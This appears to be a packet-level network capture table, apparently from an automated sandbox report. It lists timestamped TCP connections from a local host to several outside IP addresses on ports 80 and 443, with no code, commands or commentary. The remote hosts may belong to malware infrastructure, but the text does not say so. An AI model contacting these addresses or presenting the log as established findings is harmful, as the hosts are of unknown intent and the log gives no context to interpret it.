                                                            Nov 30, 2022 00:11:16.721872091 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.721896887 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.721904039 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.721935034 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.721956015 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.721966982 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.721978903 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.722007036 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.722054958 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722121954 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722145081 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722182035 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.722204924 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.722215891 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722238064 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722255945 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722274065 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722286940 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.722299099 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722318888 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722327948 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.722340107 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722358942 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722373009 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.722409010 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.722413063 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722440004 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722454071 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722477913 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722511053 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.722518921 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722537994 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.722542048 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722563028 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722583055 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722601891 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722618103 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.722637892 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722639084 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.722677946 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.722690105 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.724046946 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.726093054 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.726114988 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.726136923 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.726227999 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.771903992 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.800760984 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.800789118 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.800947905 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.802141905 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.802167892 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.802192926 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.802236080 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.802261114 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.802275896 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.802285910 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.802330017 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.802360058 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.887469053 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.928296089 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:16.971757889 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.971782923 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.971801996 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:16.972012043 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:20.979928970 CET4972880192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:21.269639969 CET8049728211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:21.272409916 CET4972880192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:21.272643089 CET4972880192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:21.275320053 CET4972880192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:21.565129995 CET8049728211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:22.504940033 CET8049728211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:22.505048990 CET8049728211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:22.505139112 CET4972880192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:22.505182981 CET4972880192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:22.579643011 CET4972980192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:22.772815943 CET8049729200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:22.773035049 CET4972980192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:22.773154974 CET4972980192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:22.773185968 CET4972980192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:22.967097998 CET8049729200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:23.272531986 CET4972880192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:23.561566114 CET8049728211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:23.625840902 CET8049729200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:23.626075029 CET4972980192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:23.633141041 CET8049729200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:23.633296013 CET4972980192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:23.820586920 CET8049729200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:24.173022032 CET4973080192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:24.472014904 CET8049730211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:24.472748041 CET4973080192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:24.472856998 CET4973080192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:24.473367929 CET4973080192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:24.766724110 CET8049730211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:25.665105104 CET8049730211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:25.665144920 CET8049730211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:25.665272951 CET4973080192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:25.665312052 CET4973080192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:25.699906111 CET4973180192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:25.960169077 CET8049730211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:25.985791922 CET8049731211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:25.985884905 CET4973180192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:25.986078978 CET4973180192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:25.987418890 CET4973180192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:26.274538994 CET8049731211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:27.160924911 CET8049731211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:27.160948992 CET8049731211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:27.161149979 CET4973180192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:27.161190033 CET4973180192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:27.269736052 CET4973280192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:27.448533058 CET8049731211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:27.552035093 CET8049732211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:27.552160978 CET4973280192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:27.552278996 CET4973280192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:27.552583933 CET4973280192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:27.835081100 CET8049732211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:28.751085997 CET8049732211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:28.751112938 CET8049732211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:28.751326084 CET4973280192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:28.821233988 CET4973280192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:29.103451967 CET8049732211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:29.950839996 CET4973380192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:32.991940022 CET4973380192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:33.288414001 CET8049733211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:33.288680077 CET4973380192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:33.288846970 CET4973380192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:33.292745113 CET4973380192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:33.587939024 CET8049733211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:34.508234978 CET8049733211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:34.508264065 CET8049733211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:34.508421898 CET4973380192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:34.508603096 CET4973380192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:34.556699038 CET4973480192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:34.804430008 CET8049733211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:34.841823101 CET8049734211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:34.842021942 CET4973480192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:34.842155933 CET4973480192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:34.842196941 CET4973480192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:35.127788067 CET8049734211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:35.781203032 CET8049734211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:35.781217098 CET8049734211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:35.781390905 CET4973480192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:35.781505108 CET4973480192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:35.838272095 CET4973680192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:36.066333055 CET8049734211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:36.131297112 CET8049736211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:36.131623983 CET4973680192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:36.131793022 CET4973680192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:36.131817102 CET4973680192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:36.421169043 CET8049736211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:37.042538881 CET8049736211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:37.042577028 CET8049736211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:37.042664051 CET4973680192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:37.042690992 CET4973680192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:37.071861029 CET4973780192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:37.256253958 CET8049737200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:37.256422997 CET4973780192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:37.256628990 CET4973780192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:37.256666899 CET4973780192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:37.332151890 CET8049736211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:37.442373991 CET8049737200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:38.125377893 CET8049737200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:38.125406027 CET8049737200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:38.125586987 CET4973780192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:38.132626057 CET4973780192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:38.160182953 CET4973880192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:38.320157051 CET8049737200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:38.390738964 CET8049738201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:38.392446995 CET4973880192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:38.392638922 CET4973880192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:38.392664909 CET4973880192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:38.614001036 CET8049738201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:39.118047953 CET8049738201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:39.121123075 CET4973880192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:39.126981020 CET8049738201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:39.130004883 CET4973880192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:39.179879904 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.179944038 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.180306911 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.182951927 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.183007002 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.259717941 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.259821892 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.263843060 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.263871908 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.264411926 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.287036896 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.287075996 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.341933966 CET8049738201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:39.353821993 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.353869915 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.354927063 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.354958057 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.381541967 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.381655931 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.381685972 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.381710052 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.381851912 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.381895065 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.381951094 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.381951094 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.381974936 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.381999969 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.412425995 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.412581921 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.412615061 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.412703991 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.412813902 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.412837982 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.412930012 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.413027048 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.413048983 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.413170099 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.413270950 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.413304090 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.413347960 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.413460016 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.413486004 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.413526058 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.413722992 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.413746119 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.441049099 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.441163063 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.441183090 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.441205025 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.441289902 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.441307068 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.441531897 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.441550970 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.441570997 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.441620111 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.441719055 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.441792965 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.441809893 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.441901922 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.442076921 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.442097902 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.442120075 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.442154884 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.469582081 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.469711065 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.469741106 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.469789982 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.469913960 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.469933033 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.475742102 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.475836039 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.475864887 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.475893974 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.475977898 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.475992918 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.476295948 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.476383924 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.476408005 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.476465940 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.476560116 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.476566076 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.476582050 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.476705074 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.476707935 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.476727009 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.476825953 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.476896048 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.477035046 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.477070093 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.477091074 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.477211952 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.477264881 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.477425098 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.477448940 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.477469921 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.477535009 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.477639914 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.477787018 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.477824926 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.477845907 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.477869987 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.478458881 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.478631020 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.478694916 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.478717089 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.478837013 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.478908062 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.478908062 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.478936911 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.479099989 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.479193926 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.479214907 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.479507923 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.479613066 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.479645014 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.479916096 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.480026007 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.480056047 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.498836994 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.498959064 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.498986959 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.499682903 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.499787092 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.499813080 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.507150888 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.507411957 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.507440090 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.508614063 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.508718967 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.508749008 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.508869886 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.509002924 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.509025097 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.509083033 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.509160042 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.509175062 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.509516954 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.509608030 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.509633064 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.509689093 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.509763002 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.509778976 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.509912968 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.509989023 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.510006905 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.510229111 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.510319948 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.510341883 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.510590076 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.510684967 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.510710001 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.510993004 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.511084080 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.511111021 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.511255980 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.511353016 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.511372089 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.511683941 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.511776924 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.511800051 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.512100935 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.512260914 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.512284994 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.512808084 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.512908936 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.512932062 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.512993097 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.513070107 CET49739443192.168.2.65.135.247.111
